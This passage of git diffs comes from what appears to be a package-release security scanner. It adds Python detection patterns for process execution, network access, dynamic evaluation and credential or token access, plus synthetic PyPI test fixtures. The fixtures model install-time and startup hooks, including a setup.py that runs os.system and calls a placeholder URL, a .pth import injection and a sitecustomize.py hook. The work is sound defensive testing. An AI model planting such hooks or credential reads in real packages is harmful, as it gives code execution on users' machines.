-  // Python network sinks.
+];
+const PYTHON_NETWORK_ACCESS_PATTERNS = [
   /\burllib\.request\b/,
   /\brequests\.(?:get|post|put|patch|delete|request)\b/,
   /\bhttp\.client\b/,
@@ -146,15 +152,14 @@ const NETWORK_ACCESS_PATTERNS = [
   /\bsmtplib\b/,
   /\burlopen\s*\(/,
 ];
-const DYNAMIC_EVALUATION_PATTERNS = [
+const JS_DYNAMIC_EVALUATION_PATTERNS = [
   /\beval\s*\(/,
   /\bnew\s+Function\s*\(/,
   /\bWebAssembly\.compile\s*\(/,
   /\batob\s*\(/,
   /\bBuffer\.from\s*\([^,]+,\s*["']base64["']\s*\)/,
-  // Python dynamic-eval and obfuscation primitives. The lookbehind keeps the
-  // bare `exec(`/`compile(` builtins from matching JS method calls such as
-  // `regex.exec(` or `WebAssembly.compile(` (already covered above).
+];
+const PYTHON_DYNAMIC_EVALUATION_PATTERNS = [
   /(?<!\.)\bexec\s*\(/,
   /\b__import__\s*\(/,
   /\bimportlib\b/,
@@ -166,14 +171,15 @@ const DYNAMIC_EVALUATION_PATTERNS = [
   /\bcodecs\.decode\s*\(/,
   /\bbytes\.fromhex\s*\(/,
 ];
-const CREDENTIAL_ACCESS_PATTERNS = [
+const JS_CREDENTIAL_ACCESS_PATTERNS = [
   /\bprocess\.env\b/,
   /\bnpm_config_/,
   /\bNPM_TOKEN\b/,
   /\bGITHUB_TOKEN\b/,
   /\bAWS_SECRET\b/,
   /\bPRIVATE_KEY\b/,
-  // Python credential/environment access.
+];
+const PYTHON_CREDENTIAL_ACCESS_PATTERNS = [
   /\bos\.environ\b/,
   /\bos\.getenv\s*\(/,
   /\bgetpass\b/,
@@ -183,13 +189,26 @@ const CREDENTIAL_ACCESS_PATTERNS = [
   /\.netrc/,
 ];
 
-// Process-execution, network, and dynamic-evaluation capability in one set.
+const JS_PATTERN_SET = {
+  processExecution: JS_PROCESS_EXECUTION_PATTERNS,
+  networkAccess: JS_NETWORK_ACCESS_PATTERNS,
+  dynamicEvaluation: JS_DYNAMIC_EVALUATION_PATTERNS,
+  credentialAccess: JS_CREDENTIAL_ACCESS_PATTERNS,
+};
+const PYTHON_PATTERN_SET = {
+  processExecution: PYTHON_PROCESS_EXECUTION_PATTERNS,
+  networkAccess: PYTHON_NETWORK_ACCESS_PATTERNS,
+  dynamicEvaluation: PYTHON_DYNAMIC_EVALUATION_PATTERNS,
+  credentialAccess: PYTHON_CREDENTIAL_ACCESS_PATTERNS,
+};
+
+// Python process-execution, network, and dynamic-evaluation capability in one set.
 // Reused by ecosystem adapters that need to know whether a file executes code
 // (e.g. a PyPI sdist's setup.py, which pip runs at install time).
-export const EXECUTION_CAPABILITY_PATTERNS = [
-  ...PROCESS_EXECUTION_PATTERNS,
-  ...NETWORK_ACCESS_PATTERNS,
-  ...DYNAMIC_EVALUATION_PATTERNS,
+export const PYTHON_EXECUTION_CAPABILITY_PATTERNS = [
+  ...PYTHON_PROCESS_EXECUTION_PATTERNS,
+  ...PYTHON_NETWORK_ACCESS_PATTERNS,
+  ...PYTHON_DYNAMIC_EVALUATION_PATTERNS,
 ];
 
 const SECRET_PATTERNS: Array<[RegExp, string]> = [
@@ -221,8 +240,10 @@ export function deterministicFindings(
   files: FileRecord[],
   diff: DiffEntry[] = [],
   packageJsonSummary?: PackageJsonSummary | null,
+  options: DeterministicFindingOptions = {},
 ): Finding[] {
   const findings: Finding[] = [];
+  const patterns = options.codePatternSet === "python" ? PYTHON_PATTERN_SET : JS_PATTERN_SET;
   const diffByPath = new Map(diff.map((entry) => [entry.path, entry]));
   const packageJsonFile = files.find((file) => file.path === "package.json" && file.textSample);
   const rawPackageJson = packageJsonFile?.textSample
@@ -291,46 +312,46 @@ export function deterministicFindings(
     const changed = diffByPath.get(file.path)?.status;
     const changedPrefix = changed && changed !== "unchanged" ? `new/changed ${changed} file: ` : "";
 
-    if (PROCESS_EXECUTION_PATTERNS.some((pattern) => pattern.test(sample))) {
+    if (patterns.processExecution.some((pattern) => pattern.test(sample))) {
       findings.push(
         tag("codeProcessExecution", {
           severity: "high",
           file: file.path,
-          line: firstMatchingLine(sample, PROCESS_EXECUTION_PATTERNS),
+          line: firstMatchingLine(sample, patterns.processExecution),
           evidence: `${changedPrefix}process or shell execution`,
           reason: "package may execute arbitrary commands",
         }),
       );
     }
-    if (NETWORK_ACCESS_PATTERNS.some((pattern) => pattern.test(sample))) {
+    if (patterns.networkAccess.some((pattern) => pattern.test(sample))) {
       findings.push(
         tag("codeNetworkAccess", {
           severity: changed === "added" ? "high" : "medium",
           file: file.path,
-          line: firstMatchingLine(sample, NETWORK_ACCESS_PATTERNS),
+          line: firstMatchingLine(sample, patterns.networkAccess),
           evidence: `${changedPrefix}network-capable code path`,
           reason:
             "unexpected network access in package code can be used for exfiltration or staged payload retrieval",
         }),
       );
     }
-    if (DYNAMIC_EVALUATION_PATTERNS.some((pattern) => pattern.test(sample))) {
+    if (patterns.dynamicEvaluation.some((pattern) => pattern.test(sample))) {
       findings.push(
         tag("codeDynamicEvaluation", {
           severity: changed === "added" ? "high" : "medium",
           file: file.path,
-          line: firstMatchingLine(sample, DYNAMIC_EVALUATION_PATTERNS),
+          line: firstMatchingLine(sample, patterns.dynamicEvaluation),
           evidence: `${changedPrefix}dynamic code or obfuscation primitive`,
           reason: "common malware and obfuscation technique",
         }),
       );
     }
-    if (CREDENTIAL_ACCESS_PATTERNS.some((pattern) => pattern.test(sample))) {
+    if (patterns.credentialAccess.some((pattern) => pattern.test(sample))) {
       findings.push(
         tag("codeCredentialAccess", {
           severity: changed === "added" ? "high" : "medium",
           file: file.path,
-          line: firstMatchingLine(sample, CREDENTIAL_ACCESS_PATTERNS),
+          line: firstMatchingLine(sample, patterns.credentialAccess),
           evidence: `${changedPrefix}secret/environment access`,
           reason: "package may read credentials from the install environment",
         }),
@@ -704,7 +725,7 @@ function splitComparableLines(text: string): string[] {
 }
 
 function findingPatternMatchesChangedLine(
-  finding: { ruleId?: string | null },
+  finding: { file: string; ruleId?: string | null },
   stagedText: string | undefined,
   changedLines: Set<number>,
 ): boolean {
@@ -723,16 +744,17 @@ function findingPatternMatchesChangedLine(
   return false;
 }
 
-function patternsForFinding(finding: { ruleId?: string | null }): RegExp[] {
+function patternsForFinding(finding: { file: string; ruleId?: string | null }): RegExp[] {
+  const patterns = finding.file.endsWith(".py") ? PYTHON_PATTERN_SET : JS_PATTERN_SET;
   switch (finding.ruleId) {
     case DETERMINISTIC_RULE_IDS.codeProcessExecution:
-      return PROCESS_EXECUTION_PATTERNS;
+      return patterns.processExecution;
     case DETERMINISTIC_RULE_IDS.codeNetworkAccess:
-      return NETWORK_ACCESS_PATTERNS;
+      return patterns.networkAccess;
     case DETERMINISTIC_RULE_IDS.codeDynamicEvaluation:
-      return DYNAMIC_EVALUATION_PATTERNS;
+      return patterns.dynamicEvaluation;
     case DETERMINISTIC_RULE_IDS.codeCredentialAccess:
-      return CREDENTIAL_ACCESS_PATTERNS;
+      return patterns.credentialAccess;
     case DETERMINISTIC_RULE_IDS.fileSecretContent:
       return SECRET_PATTERNS.map(([pattern]) => pattern);
     default:

--- a/server/lib/review.ts
+++ b/server/lib/review.ts
@@ -107,10 +107,13 @@ export interface FindingAnnotationOptions {
   previousFiles?: Array<Pick<FileRecord, "path" | "textSample" | "flags">>;
   stagedFiles?: Array<Pick<FileRecord, "path" | "textSample" | "flags">>;
   persistedAnnotations?: Map<string, FindingDiffAnnotation>;
+  codePatternSet?: CodePatternSet;
 }
 
+export type CodePatternSet = "javascript" | "python";
+
 export interface DeterministicFindingOptions {
-  codePatternSet?: "javascript" | "python";
+  codePatternSet?: CodePatternSet;
 }
 
 const LIFECYCLE_SCRIPTS = ["preinstall", "install", "postinstall", "prepare"];
@@ -243,7 +246,7 @@ export function deterministicFindings(
   options: DeterministicFindingOptions = {},
 ): Finding[] {
   const findings: Finding[] = [];
-  const patterns = options.codePatternSet === "python" ? PYTHON_PATTERN_SET : JS_PATTERN_SET;
+  const patterns = codePatternsFor(options.codePatternSet);
   const diffByPath = new Map(diff.map((entry) => [entry.path, entry]));
   const packageJsonFile = files.find((file) => file.path === "package.json" && file.textSample);
   const rawPackageJson = packageJsonFile?.textSample
@@ -616,6 +619,7 @@ export function annotateFindingsWithDiffStatus<
           previousByPath,
           stagedByPath,
           changedLineCache,
+          options.codePatternSet,
         ),
     };
   });
@@ -659,6 +663,7 @@ function isFindingOnReleaseDelta(
   previousByPath: Map<string, Pick<FileRecord, "path" | "textSample" | "flags">>,
   stagedByPath: Map<string, Pick<FileRecord, "path" | "textSample" | "flags">>,
   changedLineCache: Map<string, Set<number> | null>,
+  codePatternSet: CodePatternSet | undefined,
 ): boolean {
   if (diffStatus === "added") return true;
   if (diffStatus !== "modified") return false;
@@ -676,6 +681,7 @@ function isFindingOnReleaseDelta(
     finding,
     stagedByPath.get(finding.file)?.textSample,
     changedLines,
+    codePatternSet,
   );
 }
 
@@ -728,9 +734,10 @@ function findingPatternMatchesChangedLine(
   finding: { file: string; ruleId?: string | null },
   stagedText: string | undefined,
   changedLines: Set<number>,
+  codePatternSet: CodePatternSet | undefined,
 ): boolean {
   if (!stagedText) return false;
-  const patterns = patternsForFinding(finding);
+  const patterns = patternsForFinding(finding, codePatternSet);
   if (!patterns.length) return false;
   const lines = splitComparableLines(stagedText);
   for (const lineNumber of changedLines) {
@@ -744,8 +751,15 @@ function findingPatternMatchesChangedLine(
   return false;
 }
 
-function patternsForFinding(finding: { file: string; ruleId?: string | null }): RegExp[] {
-  const patterns = finding.file.endsWith(".py") ? PYTHON_PATTERN_SET : JS_PATTERN_SET;
+function patternsForFinding(
+  finding: { file: string; ruleId?: string | null },
+  codePatternSet: CodePatternSet | undefined,
+): RegExp[] {
+  const patterns = codePatternSet
+    ? codePatternsFor(codePatternSet)
+    : finding.file.endsWith(".py")
+      ? PYTHON_PATTERN_SET
+      : JS_PATTERN_SET;
   switch (finding.ruleId) {
     case DETERMINISTIC_RULE_IDS.codeProcessExecution:
       return patterns.processExecution;
@@ -760,6 +774,10 @@ function patternsForFinding(finding: { file: string; ruleId?: string | null }): 
     default:
       return [];
   }
+}
+
+function codePatternsFor(codePatternSet: CodePatternSet | undefined): typeof JS_PATTERN_SET {
+  return codePatternSet === "python" ? PYTHON_PATTERN_SET : JS_PATTERN_SET;
 }
 
 export function isReleaseDeltaStatus(status: FindingDiffStatus): boolean {

--- a/server/lib/review.ts
+++ b/server/lib/review.ts
@@ -137,7 +137,7 @@ const NETWORK_ACCESS_PATTERNS = [
   /\bXMLHttpRequest\b/,
   /\baxios\s*\./,
   // Python network sinks.
-  /\burllib(?:\.request)?\b/,
+  /\burllib\.request\b/,
   /\brequests\.(?:get|post|put|patch|delete|request)\b/,
   /\bhttp\.client\b/,
   /\bhttplib\b/,

--- a/server/lib/scan-pipeline.ts
+++ b/server/lib/scan-pipeline.ts
@@ -76,6 +76,7 @@ export async function runScanPipeline<TInput, TBroker extends AdapterBroker>(
     const annotatedFindings = annotateFindingsWithDiffStatus(ruleFindings, fileDiff, {
       previousFiles: redactedPreviousFiles,
       stagedFiles: redactedStagedFiles,
+      codePatternSet: adapter.codePatternSet,
     });
     const releaseRuleFindings = stripFindingAnnotations(
       annotatedFindings.filter((finding) => finding.releaseDelta),

--- a/test/fixtures/security-corpus/README.md
+++ b/test/fixtures/security-corpus/README.md
@@ -1,12 +1,16 @@
 # Security detection corpus fixtures
 
-This directory contains Drydock's synthetic golden corpus for deterministic npm staged-publish review.
+This directory contains Drydock's synthetic golden corpus for deterministic staged-publish review.
 
+- `cases/` holds npm fixtures evaluated by `test/security-corpus.test.mjs`.
+- `cases-pypi/` holds PyPI release-artifact fixtures evaluated by `test/security-corpus-pypi.test.mjs`.
 - Fixtures are intentionally small JSON documents, not tarballs and not real malware.
-- `stagedFiles` and `previousFiles` use the same `FileRecord` shape returned by the sandbox.
+- `stagedFiles`/`previousFiles` (npm) and `artifacts`/`previousArtifacts` (PyPI) use the same `FileRecord` shape returned by the sandbox.
 - `expectedFindings` names the exact deterministic rule IDs, severities, and files expected today.
 - `expectedRisk` records the expected deterministic risk from those findings.
 - Optional `expectedPackageJsonDiff` assertions cover diff surfaces that may not yet produce findings.
 - `coverageGaps` records intentional blind spots so future rule work can promote them into findings.
+
+PyPI `expectedFindings[].file` uses two namespacing schemes: `pypi.*` findings use the literal manifest artifact path joined to the in-archive file path (sdists root-stripped); shared `file.*`/`code.*`/`diff.*` findings use the diff namespace (`sdist/…` or `wheel/<sorted WHEEL tags>/…`, with `.dist-info` collapsed). See `docs/security-detection-corpus.md` for the full cheat-sheet.
 
 Do not vendor live malicious packages, encrypted malware archives, real credentials, or raw customer package bytes here. Use synthetic `example.invalid` endpoints and obviously fake secrets only.

--- a/test/fixtures/security-corpus/cases-pypi/01-benign-control.json
+++ b/test/fixtures/security-corpus/cases-pypi/01-benign-control.json
@@ -42,7 +42,7 @@
           "size": 200,
           "sha256": "3333333333333333333333333333333333333333333333333333333333333333",
           "flags": [],
-          "textSample": "demo_package/__init__.py,sha256=abc,12\ndemo_package-1.2.0.dist-info/METADATA,,\ndemo_package-1.2.0.dist-info/WHEEL,,\ndemo_package-1.2.0.dist-info/RECORD,,\n"
+          "textSample": "demo_package/__init__.py,sha256=abc,12\ndemo_package/inject.pth,,\ndemo_package/sitecustomize.py,,\ndemo_package-1.2.0.dist-info/METADATA,,\ndemo_package-1.2.0.dist-info/WHEEL,,\ndemo_package-1.2.0.dist-info/RECORD,,\n"
         },
         {
           "path": "demo_package/__init__.py",
@@ -50,6 +50,20 @@
           "sha256": "4444444444444444444444444444444444444444444444444444444444444444",
           "flags": [],
           "textSample": "__version__ = \"1.2.0\"\n"
+        },
+        {
+          "path": "demo_package/inject.pth",
+          "size": 30,
+          "sha256": "4545454545454545454545454545454545454545454545454545454545454545",
+          "flags": [],
+          "textSample": "import demo_package.bootstrap\n"
+        },
+        {
+          "path": "demo_package/sitecustomize.py",
+          "size": 22,
+          "sha256": "4646464646464646464646464646464646464646464646464646464646464646",
+          "flags": [],
+          "textSample": "VALUE = \"package-local\"\n"
         }
       ]
     },

--- a/test/fixtures/security-corpus/cases-pypi/01-benign-control.json
+++ b/test/fixtures/security-corpus/cases-pypi/01-benign-control.json
@@ -1,0 +1,85 @@
+{
+  "id": "pypi-benign-control",
+  "title": "clean wheel + sdist version bump raises nothing",
+  "category": "control",
+  "intent": "a well-formed release with matching metadata, complete RECORD, and no active code must stay low risk",
+  "manifest": {
+    "schema": "drydock.release-artifacts.v1",
+    "ecosystem": "pypi",
+    "package": "demo-package",
+    "version": "1.2.0",
+    "artifacts": [
+      {
+        "path": "dist/demo_package-1.2.0-py3-none-any.whl",
+        "sha256": "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
+      },
+      {
+        "path": "dist/demo_package-1.2.0.tar.gz",
+        "sha256": "bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb"
+      }
+    ]
+  },
+  "artifacts": [
+    {
+      "path": "dist/demo_package-1.2.0-py3-none-any.whl",
+      "files": [
+        {
+          "path": "demo_package-1.2.0.dist-info/METADATA",
+          "size": 96,
+          "sha256": "1111111111111111111111111111111111111111111111111111111111111111",
+          "flags": [],
+          "textSample": "Metadata-Version: 2.3\nName: demo-package\nVersion: 1.2.0\nRequires-Dist: requests>=2\n"
+        },
+        {
+          "path": "demo_package-1.2.0.dist-info/WHEEL",
+          "size": 60,
+          "sha256": "2222222222222222222222222222222222222222222222222222222222222222",
+          "flags": [],
+          "textSample": "Wheel-Version: 1.0\nRoot-Is-Purelib: true\nTag: py3-none-any\n"
+        },
+        {
+          "path": "demo_package-1.2.0.dist-info/RECORD",
+          "size": 200,
+          "sha256": "3333333333333333333333333333333333333333333333333333333333333333",
+          "flags": [],
+          "textSample": "demo_package/__init__.py,sha256=abc,12\ndemo_package-1.2.0.dist-info/METADATA,,\ndemo_package-1.2.0.dist-info/WHEEL,,\ndemo_package-1.2.0.dist-info/RECORD,,\n"
+        },
+        {
+          "path": "demo_package/__init__.py",
+          "size": 24,
+          "sha256": "4444444444444444444444444444444444444444444444444444444444444444",
+          "flags": [],
+          "textSample": "__version__ = \"1.2.0\"\n"
+        }
+      ]
+    },
+    {
+      "path": "dist/demo_package-1.2.0.tar.gz",
+      "files": [
+        {
+          "path": "demo_package-1.2.0/PKG-INFO",
+          "size": 64,
+          "sha256": "5555555555555555555555555555555555555555555555555555555555555555",
+          "flags": [],
+          "textSample": "Metadata-Version: 2.3\nName: demo-package\nVersion: 1.2.0\n"
+        },
+        {
+          "path": "demo_package-1.2.0/setup.py",
+          "size": 80,
+          "sha256": "6666666666666666666666666666666666666666666666666666666666666666",
+          "flags": [],
+          "textSample": "from setuptools import setup\n\nsetup(name=\"demo-package\", version=\"1.2.0\")\n"
+        },
+        {
+          "path": "demo_package-1.2.0/demo_package/__init__.py",
+          "size": 24,
+          "sha256": "7777777777777777777777777777777777777777777777777777777777777777",
+          "flags": [],
+          "textSample": "__version__ = \"1.2.0\"\n"
+        }
+      ]
+    }
+  ],
+  "expectedRisk": "low",
+  "expectedFindings": []
+}

--- a/test/fixtures/security-corpus/cases-pypi/02-sdist-setup-cmdclass.json
+++ b/test/fixtures/security-corpus/cases-pypi/02-sdist-setup-cmdclass.json
@@ -1,0 +1,47 @@
+{
+  "id": "pypi-sdist-setup-cmdclass",
+  "title": "sdist setup.py custom install command",
+  "category": "install-time-code",
+  "intent": "a custom cmdclass install command runs arbitrary code on pip install of an sdist",
+  "manifest": {
+    "schema": "drydock.release-artifacts.v1",
+    "ecosystem": "pypi",
+    "package": "demo-package",
+    "version": "1.2.0",
+    "artifacts": [
+      {
+        "path": "dist/demo_package-1.2.0.tar.gz",
+        "sha256": "bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb"
+      }
+    ]
+  },
+  "artifacts": [
+    {
+      "path": "dist/demo_package-1.2.0.tar.gz",
+      "files": [
+        {
+          "path": "demo_package-1.2.0/PKG-INFO",
+          "size": 64,
+          "sha256": "5555555555555555555555555555555555555555555555555555555555555555",
+          "flags": [],
+          "textSample": "Metadata-Version: 2.3\nName: demo-package\nVersion: 1.2.0\n"
+        },
+        {
+          "path": "demo_package-1.2.0/setup.py",
+          "size": 140,
+          "sha256": "8888888888888888888888888888888888888888888888888888888888888888",
+          "flags": [],
+          "textSample": "from setuptools import setup\nfrom setuptools.command.install import install\n\nsetup(name=\"demo-package\", version=\"1.2.0\", cmdclass={\"install\": install})\n"
+        }
+      ]
+    }
+  ],
+  "expectedRisk": "high",
+  "expectedFindings": [
+    {
+      "ruleId": "pypi.setup-install-command",
+      "severity": "high",
+      "file": "dist/demo_package-1.2.0.tar.gz/setup.py"
+    }
+  ]
+}

--- a/test/fixtures/security-corpus/cases-pypi/03-sdist-setup-body-exec.json
+++ b/test/fixtures/security-corpus/cases-pypi/03-sdist-setup-body-exec.json
@@ -1,0 +1,57 @@
+{
+  "id": "pypi-sdist-setup-body-exec",
+  "title": "sdist setup.py executes process and network code at top level",
+  "category": "install-time-code",
+  "intent": "top-level process/network calls in setup.py run on pip install and must fire the upgraded setup rule plus shared code rules",
+  "manifest": {
+    "schema": "drydock.release-artifacts.v1",
+    "ecosystem": "pypi",
+    "package": "demo-package",
+    "version": "1.2.0",
+    "artifacts": [
+      {
+        "path": "dist/demo_package-1.2.0.tar.gz",
+        "sha256": "bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb"
+      }
+    ]
+  },
+  "artifacts": [
+    {
+      "path": "dist/demo_package-1.2.0.tar.gz",
+      "files": [
+        {
+          "path": "demo_package-1.2.0/PKG-INFO",
+          "size": 64,
+          "sha256": "5555555555555555555555555555555555555555555555555555555555555555",
+          "flags": [],
+          "textSample": "Metadata-Version: 2.3\nName: demo-package\nVersion: 1.2.0\n"
+        },
+        {
+          "path": "demo_package-1.2.0/setup.py",
+          "size": 200,
+          "sha256": "9999999999999999999999999999999999999999999999999999999999999999",
+          "flags": [],
+          "textSample": "import os\nimport urllib.request\nfrom setuptools import setup\n\nos.system(\"id\")\nurllib.request.urlopen(\"https://example.invalid/ping\")\nsetup(name=\"demo-package\", version=\"1.2.0\")\n"
+        }
+      ]
+    }
+  ],
+  "expectedRisk": "high",
+  "expectedFindings": [
+    {
+      "ruleId": "pypi.setup-install-command",
+      "severity": "high",
+      "file": "dist/demo_package-1.2.0.tar.gz/setup.py"
+    },
+    {
+      "ruleId": "code.process-execution",
+      "severity": "high",
+      "file": "sdist/setup.py"
+    },
+    {
+      "ruleId": "code.network-access",
+      "severity": "high",
+      "file": "sdist/setup.py"
+    }
+  ]
+}

--- a/test/fixtures/security-corpus/cases-pypi/04-wheel-pth-import-injection.json
+++ b/test/fixtures/security-corpus/cases-pypi/04-wheel-pth-import-injection.json
@@ -38,10 +38,10 @@
           "size": 200,
           "sha256": "3333333333333333333333333333333333333333333333333333333333333333",
           "flags": [],
-          "textSample": "demo_package/inject.pth,,\ndemo_package-1.2.0.dist-info/METADATA,,\ndemo_package-1.2.0.dist-info/WHEEL,,\ndemo_package-1.2.0.dist-info/RECORD,,\n"
+          "textSample": "inject.pth,,\ndemo_package-1.2.0.dist-info/METADATA,,\ndemo_package-1.2.0.dist-info/WHEEL,,\ndemo_package-1.2.0.dist-info/RECORD,,\n"
         },
         {
-          "path": "demo_package/inject.pth",
+          "path": "inject.pth",
           "size": 32,
           "sha256": "aaaa1111111111111111111111111111111111111111111111111111111111aa",
           "flags": [],
@@ -55,7 +55,7 @@
     {
       "ruleId": "pypi.pth-execution",
       "severity": "high",
-      "file": "dist/demo_package-1.2.0-py3-none-any.whl/demo_package/inject.pth"
+      "file": "dist/demo_package-1.2.0-py3-none-any.whl/inject.pth"
     }
   ]
 }

--- a/test/fixtures/security-corpus/cases-pypi/04-wheel-pth-import-injection.json
+++ b/test/fixtures/security-corpus/cases-pypi/04-wheel-pth-import-injection.json
@@ -1,0 +1,61 @@
+{
+  "id": "pypi-wheel-pth-import-injection",
+  "title": "wheel ships a .pth file with an import line",
+  "category": "startup-hook",
+  "intent": ".pth import lines execute on interpreter startup once the wheel is installed",
+  "manifest": {
+    "schema": "drydock.release-artifacts.v1",
+    "ecosystem": "pypi",
+    "package": "demo-package",
+    "version": "1.2.0",
+    "artifacts": [
+      {
+        "path": "dist/demo_package-1.2.0-py3-none-any.whl",
+        "sha256": "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
+      }
+    ]
+  },
+  "artifacts": [
+    {
+      "path": "dist/demo_package-1.2.0-py3-none-any.whl",
+      "files": [
+        {
+          "path": "demo_package-1.2.0.dist-info/METADATA",
+          "size": 64,
+          "sha256": "1111111111111111111111111111111111111111111111111111111111111111",
+          "flags": [],
+          "textSample": "Metadata-Version: 2.3\nName: demo-package\nVersion: 1.2.0\n"
+        },
+        {
+          "path": "demo_package-1.2.0.dist-info/WHEEL",
+          "size": 60,
+          "sha256": "2222222222222222222222222222222222222222222222222222222222222222",
+          "flags": [],
+          "textSample": "Wheel-Version: 1.0\nRoot-Is-Purelib: true\nTag: py3-none-any\n"
+        },
+        {
+          "path": "demo_package-1.2.0.dist-info/RECORD",
+          "size": 200,
+          "sha256": "3333333333333333333333333333333333333333333333333333333333333333",
+          "flags": [],
+          "textSample": "demo_package/inject.pth,,\ndemo_package-1.2.0.dist-info/METADATA,,\ndemo_package-1.2.0.dist-info/WHEEL,,\ndemo_package-1.2.0.dist-info/RECORD,,\n"
+        },
+        {
+          "path": "demo_package/inject.pth",
+          "size": 32,
+          "sha256": "aaaa1111111111111111111111111111111111111111111111111111111111aa",
+          "flags": [],
+          "textSample": "import demo_package.bootstrap\n"
+        }
+      ]
+    }
+  ],
+  "expectedRisk": "high",
+  "expectedFindings": [
+    {
+      "ruleId": "pypi.pth-execution",
+      "severity": "high",
+      "file": "dist/demo_package-1.2.0-py3-none-any.whl/demo_package/inject.pth"
+    }
+  ]
+}

--- a/test/fixtures/security-corpus/cases-pypi/05-wheel-sitecustomize-hook.json
+++ b/test/fixtures/security-corpus/cases-pypi/05-wheel-sitecustomize-hook.json
@@ -1,0 +1,61 @@
+{
+  "id": "pypi-wheel-sitecustomize-hook",
+  "title": "wheel bundles a sitecustomize.py startup hook",
+  "category": "startup-hook",
+  "intent": "sitecustomize.py runs on every interpreter startup once installed, a common persistence hook",
+  "manifest": {
+    "schema": "drydock.release-artifacts.v1",
+    "ecosystem": "pypi",
+    "package": "demo-package",
+    "version": "1.2.0",
+    "artifacts": [
+      {
+        "path": "dist/demo_package-1.2.0-py3-none-any.whl",
+        "sha256": "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
+      }
+    ]
+  },
+  "artifacts": [
+    {
+      "path": "dist/demo_package-1.2.0-py3-none-any.whl",
+      "files": [
+        {
+          "path": "demo_package-1.2.0.dist-info/METADATA",
+          "size": 64,
+          "sha256": "1111111111111111111111111111111111111111111111111111111111111111",
+          "flags": [],
+          "textSample": "Metadata-Version: 2.3\nName: demo-package\nVersion: 1.2.0\n"
+        },
+        {
+          "path": "demo_package-1.2.0.dist-info/WHEEL",
+          "size": 60,
+          "sha256": "2222222222222222222222222222222222222222222222222222222222222222",
+          "flags": [],
+          "textSample": "Wheel-Version: 1.0\nRoot-Is-Purelib: true\nTag: py3-none-any\n"
+        },
+        {
+          "path": "demo_package-1.2.0.dist-info/RECORD",
+          "size": 200,
+          "sha256": "3333333333333333333333333333333333333333333333333333333333333333",
+          "flags": [],
+          "textSample": "sitecustomize.py,,\ndemo_package-1.2.0.dist-info/METADATA,,\ndemo_package-1.2.0.dist-info/WHEEL,,\ndemo_package-1.2.0.dist-info/RECORD,,\n"
+        },
+        {
+          "path": "sitecustomize.py",
+          "size": 40,
+          "sha256": "bbbb1111111111111111111111111111111111111111111111111111111111bb",
+          "flags": [],
+          "textSample": "# bootstrap hook\nimport demo_package\n"
+        }
+      ]
+    }
+  ],
+  "expectedRisk": "high",
+  "expectedFindings": [
+    {
+      "ruleId": "pypi.startup-hook",
+      "severity": "high",
+      "file": "dist/demo_package-1.2.0-py3-none-any.whl/sitecustomize.py"
+    }
+  ]
+}

--- a/test/fixtures/security-corpus/cases-pypi/06-wheel-metadata-mismatch.json
+++ b/test/fixtures/security-corpus/cases-pypi/06-wheel-metadata-mismatch.json
@@ -1,0 +1,54 @@
+{
+  "id": "pypi-wheel-metadata-mismatch",
+  "title": "wheel METADATA name does not match the reviewed manifest",
+  "category": "metadata-integrity",
+  "intent": "an artifact whose embedded package name diverges from the signed manifest is a substitution/confusion signal",
+  "manifest": {
+    "schema": "drydock.release-artifacts.v1",
+    "ecosystem": "pypi",
+    "package": "demo-package",
+    "version": "1.2.0",
+    "artifacts": [
+      {
+        "path": "dist/demo_package-1.2.0-py3-none-any.whl",
+        "sha256": "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
+      }
+    ]
+  },
+  "artifacts": [
+    {
+      "path": "dist/demo_package-1.2.0-py3-none-any.whl",
+      "files": [
+        {
+          "path": "demo_package-1.2.0.dist-info/METADATA",
+          "size": 64,
+          "sha256": "1111111111111111111111111111111111111111111111111111111111111111",
+          "flags": [],
+          "textSample": "Metadata-Version: 2.3\nName: other-package\nVersion: 1.2.0\n"
+        },
+        {
+          "path": "demo_package-1.2.0.dist-info/WHEEL",
+          "size": 60,
+          "sha256": "2222222222222222222222222222222222222222222222222222222222222222",
+          "flags": [],
+          "textSample": "Wheel-Version: 1.0\nRoot-Is-Purelib: true\nTag: py3-none-any\n"
+        },
+        {
+          "path": "demo_package-1.2.0.dist-info/RECORD",
+          "size": 160,
+          "sha256": "3333333333333333333333333333333333333333333333333333333333333333",
+          "flags": [],
+          "textSample": "demo_package-1.2.0.dist-info/METADATA,,\ndemo_package-1.2.0.dist-info/WHEEL,,\ndemo_package-1.2.0.dist-info/RECORD,,\n"
+        }
+      ]
+    }
+  ],
+  "expectedRisk": "critical",
+  "expectedFindings": [
+    {
+      "ruleId": "pypi.metadata-mismatch",
+      "severity": "critical",
+      "file": "dist/demo_package-1.2.0-py3-none-any.whl/demo_package-1.2.0.dist-info/METADATA"
+    }
+  ]
+}

--- a/test/fixtures/security-corpus/cases-pypi/07-wheel-metadata-missing.json
+++ b/test/fixtures/security-corpus/cases-pypi/07-wheel-metadata-missing.json
@@ -42,6 +42,11 @@
       "ruleId": "pypi.metadata-missing",
       "severity": "medium",
       "file": "dist/demo_package-1.2.0-py3-none-any.whl/METADATA"
+    },
+    {
+      "ruleId": "pypi.wheel-record-missing",
+      "severity": "medium",
+      "file": "dist/demo_package-1.2.0-py3-none-any.whl/RECORD"
     }
   ]
 }

--- a/test/fixtures/security-corpus/cases-pypi/07-wheel-metadata-missing.json
+++ b/test/fixtures/security-corpus/cases-pypi/07-wheel-metadata-missing.json
@@ -1,0 +1,47 @@
+{
+  "id": "pypi-wheel-metadata-missing",
+  "title": "wheel without parseable METADATA",
+  "category": "metadata-integrity",
+  "intent": "release gates need name and version metadata to prove the artifact matches the reviewed manifest",
+  "manifest": {
+    "schema": "drydock.release-artifacts.v1",
+    "ecosystem": "pypi",
+    "package": "demo-package",
+    "version": "1.2.0",
+    "artifacts": [
+      {
+        "path": "dist/demo_package-1.2.0-py3-none-any.whl",
